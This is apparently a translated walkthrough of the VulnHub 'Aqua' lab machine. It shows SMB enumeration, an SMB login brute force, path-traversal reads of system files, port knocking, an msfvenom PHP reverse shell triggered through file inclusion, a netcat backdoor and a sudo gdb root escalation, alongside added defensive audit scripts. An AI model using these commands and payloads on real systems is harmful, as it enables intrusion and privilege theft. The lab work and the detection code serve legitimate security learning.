https://www.vulnhub.com/entry/aqua-1,419/
Target IP: 192.168.1.98
root@kali:~/Aqua# nmap -sS -sV -O 192.168.1.98
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-19 11:38 CEST
Nmap scan report for salamancageek.com (192.168.1.98)
Host is up (0.00074s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
21/tcp filtered ftp
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 08:00:27:BD:32:FA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: LINUXLITE
On the web page
If we answer yes
root@kali:~/Aqua# enum4linux -a 192.168.1.98
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jul 19 11:56:10 2020
==========================
| Target Information |
==========================
Target ........... 192.168.1.98
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on 192.168.1.98 |
====================================================
[+] Got domain/workgroup name: WORKGROUP
============================================
| Nbtstat Information for 192.168.1.98 |
============================================
Looking up status of 192.168.1.98
LINUXLITE <00> - B <ACTIVE> Workstation Service
LINUXLITE <03> - B <ACTIVE> Messenger Service
LINUXLITE <20> - B <ACTIVE> File Server Service
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
=====================================
| Session Check on 192.168.1.98 |
=====================================
[+] Server 192.168.1.98 allows sessions using username '', password ''
===========================================
| Getting domain SID for 192.168.1.98 |
===========================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
======================================
| OS information on 192.168.1.98 |
======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.1.98 from smbclient:
[+] Got OS info for 192.168.1.98 from srvinfo:
LINUXLITE Wk Sv PrQ Unx NT SNT Linux Lite Shares
platform_id : 500
os version : 6.1
server type : 0x809a03
=============================
| Users on 192.168.1.98 |
=============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.
Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.
=========================================
| Share Enumeration on 192.168.1.98 |
=========================================
Sharename Type Comment
--------- ---- -------
liteshare Disk
IPC$ IPC IPC Service (Linux Lite Shares)
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 192.168.1.98
//192.168.1.98/liteshare Mapping: DENIED, Listing: N/A
//192.168.1.98/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
====================================================
| Password Policy Information for 192.168.1.98 |
====================================================
[E] Unexpected error from polenum:
Traceback (most recent call last):
File "/usr/bin/polenum", line 16, in <module>
from impacket.dcerpc.v5.rpcrt import DCERPC_v5
File "/usr/lib/python2.7/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 28, in <module>
from impacket.krb5 import kerberosv5, gssapi
File "/usr/lib/python2.7/dist-packages/impacket/krb5/kerberosv5.py", line 23, in <module>
from pyasn1.type.univ import noValue
ImportError: cannot import name noValue
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
==============================
| Groups on 192.168.1.98 |
==============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=======================================================================
| Users on 192.168.1.98 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2516775589-3608648501-3152225691
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\aqua (Local User)
S-1-22-1-1001 Unix User\megumin (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-5-21-2516775589-3608648501-3152225691 and logon username '', password ''
S-1-5-21-2516775589-3608648501-3152225691-501 LINUXLITE\nobody (Local User)
S-1-5-21-2516775589-3608648501-3152225691-513 LINUXLITE\None (Domain Group)
=============================================
| Getting printer info for 192.168.1.98 |
=============================================
No printers returned.
enum4linux complete on Sun Jul 19 11:56:47 2020
We have the users
aqua and megumin
Using Metasploit's scanner/smb/smb_login module we find that one account is megumin:admin and the other is aqua:admin
[*] 192.168.1.98:445 - 192.168.1.98:445 - Starting SMB login bruteforce
[+] 192.168.1.98:445 - 192.168.1.98:445 - Success: '.\aqua:admin'
[!] 192.168.1.98:445 - No active DB -- Credential data will not be saved!
[+] 192.168.1.98:445 - 192.168.1.98:445 - Success: '.\megumin:admin'
[*] 192.168.1.98:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
root@kali:~/Aqua# nikto -host 192.168.1.98
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.98
+ Target Hostname: 192.168.1.98
+ Target Port: 80
+ Start Time: 2020-07-25 13:28:21 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Cookie PHPSESSID created without the httponly flag
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7916 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2020-07-25 13:29:19 (GMT2) (58 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
If we log in with the credentials given in yes.html
megumin:watashiwamegumin
http://192.168.1.98/home.php?showcase=/../../../../../etc/hosts
We get
127.0.0.1 localhost
127.0.1.1 aqua
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
http://192.168.1.98/home.php?showcase=/../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:117:Light Display Manager:/var/lib/lightdm:/bin/false
ntp:x:109:119::/home/ntp:/bin/false
avahi:x:110:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:111:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
nm-openconnect:x:114:124:NetworkManager OpenConnect plugin,,,:/var/lib/NetworkManager:/bin/false
nm-openvpn:x:115:125:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/bin/false
pulse:x:116:126:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:117:128:RealtimeKit,,,:/proc:/bin/false
saned:x:118:129::/var/lib/saned:/bin/false
usbmux:x:119:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
aqua:x:1000:1000:aqua,,,:/home/aqua:/bin/bash
mysql:x:120:131:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:121:132:ftp daemon,,,:/srv/ftp:/bin/false
megumin:x:1001:1001:,,,:/var/www/html/deployment:/bin/bash
http://192.168.1.98/home.php?showcase=/../../../../../etc/default/openvpn
# This is the configuration file for /etc/init.d/openvpn
#
# Start only these VPNs automatically via init script.
# Allowed values are "all", "none" or space separated list of
# names of the VPNs. If empty, "all" is assumed.
# The VPN name refers to the VPN configutation file name.
# i.e. "home" would be /etc/openvpn/home.conf
#
# If you're running systemd, changing this variable will
# require running "systemctl daemon-reload" followed by
# a restart of the openvpn service (if you removed entries
# you may have to stop those manually)
#
#AUTOSTART="all"
#AUTOSTART="none"
#AUTOSTART="home office"
#
# WARNING: If you're running systemd the rest of the
# options in this file are ignored.
#
# Refresh interval (in seconds) of default status files
# located in /var/run/openvpn.$NAME.status
# Defaults to 10, 0 disables status file generation
#
#STATUSREFRESH=10
#STATUSREFRESH=0
# Optional arguments to openvpn's command line
OPTARGS=""
#
# If you need openvpn running after sendsigs, i.e.
# to let umountnfs work over the vpn, set OMIT_SENDSIGS
# to 1 and include umountnfs as Required-Stop: in openvpn's
# init.d script (remember to run insserv after that)
#
OMIT_SENDSIGS=0
Recall that we had
PORT STATE SERVICE VERSION
21/tcp filtered ftp
so there is a firewall (most likely iptables) protecting the FTP server.
There is a security mechanism for this, port knocking: when a service sits behind a firewall that protects it, but we want to reach it from outside (as administrators) when needed, we hit a specific, ordered sequence of ports, and iptables then opens access for us.
For that, the host most likely has knockd installed (apt-get install knockd), whose configuration file is /etc/knockd.conf
Let's try
http://192.168.1.98/home.php?showcase=/../../../../../etc/knockd.conf
[options]
UseSysLog
Interface=enp0s3
[FTP]
sequence = 1234:tcp,5678:tcp,9012:tcp
seq_timeout = 15
tcpflags = syn
command = iptables -I INPUT 1 -s %IP% -p tcp -m tcp --dport 21 -j ACCEPT
Indeed, and specifically we have to knock on the ports in this order: 1234, 5678, 9012.
root@kali:~/Aqua# knock 192.168.1.98 1234 5678 9012 -v
hitting tcp 192.168.1.98:1234
hitting tcp 192.168.1.98:5678
hitting tcp 192.168.1.98:9012
OK, the ports have been knocked; let's look again.
root@kali:~/Aqua# nmap 192.168.1.98
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-01 18:36 CEST
Nmap scan report for salamancageek.com (192.168.1.98)
Host is up (0.0012s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 08:00:27:BD:32:FA (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
It is now open
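The knockd.conf read above can be reviewed from the defender's side. The following is an added example, not part of the original write-up or of knockd: it parses the file and flags a door whose sequence is static and whose firewall rule is never removed. The [FTP-timed] stanza, its file path and the finding names are assumptions made for comparison.

```python
import configparser

# Constructed input: [options] and [FTP] are the stanzas shown on this page;
# [FTP-timed] is a hypothetical variant added here for comparison.
SAMPLE_CONF = """\
[options]
UseSysLog
Interface=enp0s3

[FTP]
sequence = 1234:tcp,5678:tcp,9012:tcp
seq_timeout = 15
tcpflags = syn
command = iptables -I INPUT 1 -s %IP% -p tcp -m tcp --dport 21 -j ACCEPT

[FTP-timed]
one_time_sequences = /etc/knockd/ftp.sequences
seq_timeout = 5
tcpflags = syn
start_command = iptables -I INPUT 1 -s %IP% -p tcp -m tcp --dport 21 -j ACCEPT
cmd_timeout = 30
stop_command = iptables -D INPUT -s %IP% -p tcp -m tcp --dport 21 -j ACCEPT
"""


def parse_knockd(text):
    """Parse knockd.conf text into {door_name: {option: value}}."""
    parser = configparser.ConfigParser(
        allow_no_value=True,   # [options] holds bare flags such as UseSysLog
        interpolation=None,    # keep the literal %IP% token in commands
        delimiters=("=",),     # ':' appears inside sequences (1234:tcp)
    )
    parser.read_string(text)
    return {
        name: dict(parser[name])
        for name in parser.sections()
        if name.lower() != "options"
    }


def audit_door(opts):
    """Return finding names (labels invented for this example) for one door."""
    findings = []
    # A fixed sequence works forever for anyone who reads the file or
    # observes one knock on the wire.
    if "sequence" in opts and "one_time_sequences" not in opts:
        findings.append("static-sequence")
    # 'command' and 'start_command' both name the action run on a valid knock.
    opener = opts.get("start_command") or opts.get("command") or ""
    # Without %IP% the rule is not limited to the knocking source address.
    if opener and "%IP%" not in opener:
        findings.append("opens-for-every-source")
    # Without cmd_timeout plus stop_command the ACCEPT rule is never deleted.
    if opener and not ("cmd_timeout" in opts and "stop_command" in opts):
        findings.append("rule-never-removed")
    return findings


def audit(text):
    """Audit every door in a knockd.conf and return {door: [findings]}."""
    return {name: audit_door(opts) for name, opts in parse_knockd(text).items()}


if __name__ == "__main__":
    for door, findings in audit(SAMPLE_CONF).items():
        print(door, "->", ", ".join(findings) or "no findings")
```

The sequence is only as secret as the file that stores it, so any file-read flaw on the same host, such as the one in home.php, discloses it.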
Let's look at the FTP server
root@kali:~/Aqua# ftp
ftp> o
(to) 192.168.1.98
Connected to 192.168.1.98.
220 (vsFTPd 3.0.3)
Name (192.168.1.98:root): megumin
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 33 33 107 Jan 16 2020 hello.php
-rw-r--r-- 1 33 33 93 Jan 16 2020 notes
drwxr-xrwx 2 1001 1001 4096 Jan 14 2020 production
226 Directory send OK.
ftp> download hello.php
?Invalid command
ftp> get hello.php
local: hello.php remote: hello.php
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for hello.php (107 bytes).
226 Transfer complete.
107 bytes received in 0.00 secs (188.9551 kB/s)
ftp> get notes
local: notes remote: notes
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for notes (93 bytes).
226 Transfer complete.
93 bytes received in 0.04 secs (2.3851 kB/s)
ftp> cd production
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r-- 1 1001 1001 52 Jan 14 2020 meow.txt
226 Directory send OK.
ftp> get meow
local: meow remote: meow
200 PORT command successful. Consider using PASV.
550 Failed to open file.
ftp> get meow.txt
local: meow.txt remote: meow.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for meow.txt (52 bytes).
226 Transfer complete.
52 bytes received in 0.00 secs (43.9284 kB/s)
ftp>
I have now downloaded everything.
root@kali:~/Aqua# cat notes
Please do not delete the /var/www/html/deployment/production/ directory - Megumin the hacker
root@kali:~/Aqua# cat hello.php
<html>
<h1 style="text-align:center;color:white;"> Welcome to my secret lair! Muahahaha... </h1>
</html>
We create a shell
root@kali:~/Aqua# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.57 LPORT=7777 -f raw > shell.php
Remember to delete the comment and append ?> at the end of shell.php
Now we reconnect to FTP and upload it
root@kali:~/Aqua# ftp 192.168.1.98
Connected to 192.168.1.98.
220 (vsFTPd 3.0.3)
Name (192.168.1.98:root): megumin
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 33 33 107 Jan 16 2020 hello.php
-rw-r--r-- 1 33 33 93 Jan 16 2020 notes
drwxr-xrwx 2 1001 1001 4096 Jan 14 2020 production
226 Directory send OK.
ftp> cd production
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r-- 1 1001 1001 52 Jan 14 2020 meow.txt
226 Directory send OK.
ftp> put shell.php
local: shell.php remote: shell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
1113 bytes sent in 0.00 secs (13.2680 MB/s)
ftp>
We open msfconsole
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse/tcp
set [-] The value specified for PAYLOAD is not valid.
msf5 exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf5 exploit(multi/handler) > set LPORT 7777
LPORT => 7777
msf5 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf5 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 0.0.0.0:7777
We use the LFI to execute the shell
192.168.1.98/home.php?showcase=../deployment/production/shell.php
msf5 exploit(multi/handler) > [*] Sending stage (38288 bytes) to 192.168.1.98
[*] Meterpreter session 1 opened (192.168.1.57:7777 -> 192.168.1.98:47814) at 2020-08-01 19:05:39 +0200
We now have a meterpreter session
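Both uses of the showcase parameter above (reading /etc files and including the uploaded shell.php) leave the same trace in the web server's access log. The following is an added detection example, not code from the original write-up: it resolves each showcase value the way a naive include would and reports requests that leave the include directory. INCLUDE_BASE, the verdict names and the log lines are assumptions constructed for the example.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

PARAM = "showcase"                        # parameter of home.php on this page
DOCROOT = "/var/www/html"                 # web root consistent with the paths on this page
INCLUDE_BASE = "/var/www/html/showcase"   # assumption: directory home.php reads from

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed access-log lines (Apache combined-log layout), not real captures.
SAMPLE_LOG = [
    '192.168.1.57 - - [01/Aug/2020:18:20:01 +0200] "GET /home.php?showcase=/../../../../../etc/hosts HTTP/1.1" 200 412',
    '192.168.1.57 - - [01/Aug/2020:18:21:10 +0200] "GET /home.php?showcase=%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fknockd.conf HTTP/1.1" 200 230',
    '192.168.1.57 - - [01/Aug/2020:19:05:38 +0200] "GET /home.php?showcase=../deployment/production/shell.php HTTP/1.1" 200 0',
    '192.168.1.20 - - [01/Aug/2020:19:10:02 +0200] "GET /home.php?showcase=gallery.html HTTP/1.1" 200 2048',
    '192.168.1.20 - - [01/Aug/2020:19:10:05 +0200] "GET /login.php HTTP/1.1" 200 900',
]


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly; logs keep the raw, possibly encoded, request."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_under(path, base):
    """True when path is base itself or lies below it."""
    return path == base or path.startswith(base.rstrip("/") + "/")


def classify(value):
    """Return (verdict, resolved_path) for one parameter value."""
    value = decode_fully(value)
    # Resolve as if the application appended the value to its include directory.
    resolved = posixpath.normpath(posixpath.join(INCLUDE_BASE, value.lstrip("/")))
    if is_under(resolved, INCLUDE_BASE):
        return "ok", resolved
    if is_under(resolved, DOCROOT):
        # Still inside the web root: typical when an uploaded file is included.
        return "outside-include-dir", resolved
    return "outside-docroot", resolved


def scan(lines):
    """Return (ip, verdict, resolved_path, status) for every suspicious request."""
    alerts = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        query = urlsplit(match.group("target")).query
        for value in parse_qs(query, keep_blank_values=True).get(PARAM, []):
            verdict, resolved = classify(value)
            if verdict != "ok":
                alerts.append(
                    (match.group("ip"), verdict, resolved, match.group("status"))
                )
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The same containment test, applied inside the application before the file is opened, is the fix: resolve the requested path and refuse anything that is not below the include directory.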
msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 1573 created.
Channel 0 created.
If we type
whoami
www-data
We try to log in as root
su
su: must be run from a terminal
We need to open a terminal
We type
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@aqua:/etc/samba$
What we did is run Python and have it execute the following instructions from the command line:
- import pty. The tty is the Linux terminal. The shell is something else: it is the command line. A pty is a pseudo-terminal (pseudo-tty).
- spawn /bin/bash (to spawn means to start it as a new process).
That way we now have a pseudo-terminal.
Let's try
www-data@aqua:/etc/samba$ su megumin
su megumin
Password: watashiwamegumin
megumin@aqua:/etc/samba$
We are now the user megumin.
If we go to /home/aqua/Desktop
we find
megumin@aqua:/home/aqua/Desktop$ ls
ls
backdoor sourcecode user.txt
cat backdoor
#!/bin/bash
echo "[+] Backdoor opened! Hehehe..."
runuser -l aqua -c 'nc -lvnp 1337 -e /bin/sh' &>/dev/null
It looks like we have a backdoor
runuser runs a command as a specific user
And if we type
cat user.txt
Congratulations!
Now, there are two ways to get root. I'll let you choose. If you managed to get both, that's gonna be AWESOME to hear! Good luck!
404CDD7BC109C432F8CC2443B45BCFE95980F5107215C645236E577929AC3E52
megumin@aqua:/home/aqua/Desktop$
OK, it tells us there are two ways to become root.
By the way, the download directory is a link to GitHub.
Using hash-identifier, we see that the hash is SHA-256
Now, if we type
megumin@aqua:/home/aqua/Desktop$ sudo /home/aqua/Desktop/backdoor
sudo /home/aqua/Desktop/backdoor
[+] Backdoor opened! Hehehe...
We open another console and type
root@kali:~# nc 192.168.1.98 1337
It sits waiting.
We again type
python -c 'import pty;pty.spawn("/bin/bash")'
And we get
root@kali:~# nc 192.168.1.98 1337
python -c 'import pty;pty.spawn("/bin/bash")'
aqua@aqua:~$
Both sudo and su grant privileges. The difference is that with su we become root within the same session, and so it asks for root's password. With sudo, on the other hand, we remain our own user, but the system grants us some of root's privileges.
Let's see what privileges aqua has
sudo -l
Matching Defaults entries for aqua on aqua:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User aqua may run the following commands on aqua:
(ALL) NOPASSWD: /root/quotes
(ALL) NOPASSWD: /root/esp
(ALL) NOPASSWD: /usr/bin/gdb
aqua@aqua:~$
The page at https://www.hacknos.com/gdb-debugger-privilege-escalation/ explains how to escalate privileges with gdb.
We run
aqua@aqua:~$ sudo gdb -nx -exec '!bash'
sudo gdb -nx -exec '!bash'
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word".
!bash: No such file or directory.
(gdb) !bash
!bash
root@aqua:~#
And now we are root.
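Seen from the defender's side, the `sudo -l` listing above can be audited for exactly this kind of rule: a program that can run other commands from inside itself, granted through sudo. The following is an added example, not part of the original write-up; the `SHELL_CAPABLE` list and the function names are assumptions made for illustration.

```python
import re

# The `sudo -l` listing for user aqua from this page, embedded as sample input.
SUDO_L = """\
Matching Defaults entries for aqua on aqua:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin
User aqua may run the following commands on aqua:
    (ALL) NOPASSWD: /root/quotes
    (ALL) NOPASSWD: /root/esp
    (ALL) NOPASSWD: /usr/bin/gdb
"""

# Assumption: a short, non-exhaustive list of programs that can run other
# commands from inside themselves (gdb's "!" escape is the case on this page).
SHELL_CAPABLE = {"gdb", "vi", "vim", "less", "more", "man", "find", "awk",
                 "python", "python3", "perl", "ruby", "bash", "sh", "env"}
RULE = re.compile(r"^\s*\(([^)]*)\)\s*(.+)$")   # "(runas) [TAG:] command, ..."
TAG = re.compile(r"^([A-Z_]+):\s*")             # e.g. "NOPASSWD: "

def parse_rules(text):
    """Return (runas, tags, command) for every command in the rule lines."""
    rules, in_rules = [], False
    for line in text.splitlines():
        in_rules = in_rules or bool(re.match(r"User \S+ may run the following", line))
        m = RULE.match(line) if in_rules else None
        if not m:
            continue
        tags = set()  # tags carry over to later commands on the same line
        for piece in re.split(r"(?<!\\),\s*", m.group(2)):
            while (t := TAG.match(piece)):
                tags.add(t.group(1))
                tags.discard({"PASSWD": "NOPASSWD", "EXEC": "NOEXEC"}.get(t.group(1)))
                piece = piece[t.end():]
            if piece.strip():
                rules.append((m.group(1).strip(), frozenset(tags), piece.strip()))
    return rules

def audit(text):
    """Flag rules whose program can hand the caller a shell as the run-as user."""
    findings = []
    for runas, tags, cmd in parse_rules(text):
        program = cmd.split()[0].rsplit("/", 1)[-1]
        if cmd == "ALL" or program in SHELL_CAPABLE:
            findings.append({"command": cmd, "runas": runas,
                             "nopasswd": "NOPASSWD" in tags, "noexec": "NOEXEC" in tags})
    return findings

if __name__ == "__main__":
    print(audit(SUDO_L))
```

Of the three rules only `/usr/bin/gdb` is flagged; the usual fix is to remove such an entry from sudoers rather than to try to constrain what the program can do once it runs as root.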
cd /root/
root@aqua:/root# ls
ls
esp quotes root.txt
root@aqua:/root# cat root.txt
cat root.txt
Congratulations on getting the root shell!
Try to get root on two ways! [If you have more, well, you're the master then.. :> ]
Need some hint on the harder way of getting root? Decode this : RG8gbm90IHVzZSAvdXNyL3NoYXJlL2dkYiBpbiB0aGUgc3Vkb2VycyBmaWxl
Or if you don't want any hint, simply don't decode it. XD
You like the box? or not? Hit me up on Twitter @yunaranyancat ;)
CCD758E72A8A8CB5F140BAB26837F363908550F2558ED86D229EC9016FED49B9
root@aqua:/root#